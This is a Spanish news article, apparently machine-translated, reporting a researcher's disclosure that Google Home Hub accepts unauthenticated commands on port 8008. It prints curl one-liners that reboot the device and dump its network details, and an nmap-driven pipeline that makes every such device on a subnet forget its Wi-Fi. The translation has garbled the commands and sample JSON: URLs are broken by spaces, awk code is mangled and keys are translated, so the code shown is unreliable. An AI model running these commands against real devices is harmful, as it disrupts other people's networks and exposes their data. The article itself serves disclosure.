El Google Home Hub es profundamente inseguro

[ad_1]

El defensor de la seguridad Jerry Gamblin ha publicado un conjunto de instrucciones, esencialmente líneas básicas de XML, que pueden extraer fácilmente información importante de Google Home Hub y, en algunos casos, bloquear temporalmente el dispositivo.

The Home Hub, que es esencialmente un Android La tableta conectada a un altavoz está diseñada para actuar como un asistente de Google en la habitación. Esto significa que se conecta a Wi-Fi (y le permite ver puntos de acceso Wi-Fi abiertos cerca del dispositivo), recibe videos y fotos de otros dispositivos (y transmite su pin) y acepta comandos de forma remota (incluido un reinicio rápido a través de línea de comando).

El comando, que consiste en una simple llamada a la URL a través de la línea de comandos, es claramente parte del proceso de configuración. Puede probar esto en casa si reemplaza el “hub” con la dirección IP local del Home Hub.

curl -Lv -H Content-Type: application / json --data-raw '{"params": "now"}' http: // hub: 8008 / setup / reboot

https://platform.twitter.com/widgets.js

Otros one-liners exponen datos adicionales, incluyendo una serie de microservicios:

$ curl -s http: // hub: 8008 / setup / eureka_info | jq
{
"bssid": "cc: be: 59: 8c: 11: 8b",
"build_version": "136769",
"cast_build_revision": "1.35.136769",
"subtítulos": {},
"conectado": verdadero,
"ethernet_connected": falso,
"has_update": falso,
"hotspot_bssid": "FA: 8F: CA: 9C: AA: 11",
"dirección_ip": "192.168.1.1",
"locale": "en-US",
"ubicación": {
"country_code": "US",
"latitud": 255,
"longitud": 255
}
"mac_address": "11: A1: 1A: 11: AA: 11",
"name": "Hub Display",
"noise_level": -94,
"opencast_pin_code": "1111",
"optar en": {
"crash": verdadero,
"a cielo abierto": verdadero,
"stats": verdadero
}
"public_key": "Removed",
"release_track": "canal estable",
"setup_state": 60,
"setup_stats": {
"historically_succeeded": verdadero,
"num_check_connectivity": 0,
"num_connect_wifi": 0,
"num_connected_wifi_not_saved": 0,
"num_initial_eureka_info": 0,
"num_obtain_ip": 0
}
"signal_level": -60,
"ssdp_udn": "11111111-adac-2b60-2102-11111aa111a",
"ssid": "SSID",
"time_format": 2,
"zona horaria": "América / Chicago",
"tos_accepted": verdadero,
"uma_client_id": "1111a111-8404-437a-87f4-1a1111111a1a",
"uptime": 25244.52,
"versión": 9,
"wpa_configurado": verdadero,
"wpa_id": 0
"wpa_state": 10
}

Finalmente, esta línea hace que todos los dispositivos en su red olviden su Wi-Fi, lo que le obliga a volver a ingresar al proceso de configuración.

nmap --open -p 8008 192.168.1.0/24 | awk '/ is up / {print up}; {gsub (/ (|) /, ""); arriba = $ NF} '| xargs -I% curl -Lv -H Content-Type: application / json --data-raw '{"wpa_id": 0}' http: //%: 8008 / setup / forget_wifi

Como señala Gamblin, estos hoyos no son impresionantes, pero son muy alarmantes. Permitir el acceso no autenticado a estos servicios es perezoso en el mejor de los casos y peligroso en el peor. También señala que estos puntos finales han estado abiertos durante años en varios Google dispositivos, lo que significa que esto es una parte regular del código base y no es considerado un exploit por Google.

Una vez más, aquí nada es de misión crítica; ningún Home Hub jamás salvará mi vida, pero sería bueno saber que los dispositivos basados ​​en la plataforma tienen un mínimo de seguridad, incluso en forma de autenticación u ofuscación. Hoy podemos reiniciar el marco de imagen excesivamente complicado del abuelo con una sola línea de código, pero mañana podremos reiniciar el concentrador de oxígeno del abuelo.

[ad_2]

Vende Todito